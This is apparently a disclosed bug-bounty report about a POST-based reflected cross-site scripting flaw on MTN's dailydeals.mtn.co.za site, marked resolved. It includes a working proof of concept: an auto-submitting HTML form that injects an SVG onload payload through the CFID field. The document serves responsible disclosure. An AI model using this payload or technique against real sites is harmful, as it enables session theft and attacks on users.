Loading HuntDB...

POST BASED REFLECTED XSS IN dailydeals.mtn.co.za

High
M
MTN Group
Submitted None
Reported by shuvam321

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Reflected
## Summary: Dear Team , I have found a post based reflected XSS in https://dailydeals.mtn.co.za/ . ## Steps To Reproduce: 1.Create a html file with following content . <form action="https://dailydeals.mtn.co.za/index.cfm?GO=CRAVE_ESTABLISHMENTS_LIST" method="POST"><input type="hidden" name="location_id" value="0"><input type="hidden" name="suburb" value="0"><input type="hidden" name="search_phrase" value=""><input type="hidden" name="submit_search" value="Search"><input type="hidden" name="m" value=""><input type="hidden" name="cpID" value=""><input type="hidden" name="CFID" value="a611fd5d-822a-4c08-a032-bcac1551f032'&quot;<!--><Svg OnLoad=(confirm)(1)-->"><input type="hidden" name="CFTOKEN" value="0"></form><script>document.forms[0].submit()</script> 2.Open the HTML file in any web-browser. 3.Cross site Scripting will be triggered . ## Impact Attacker can exploit this vulnerability to steal users cookies , redirect them to arbitrary domain and perform various attacks.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected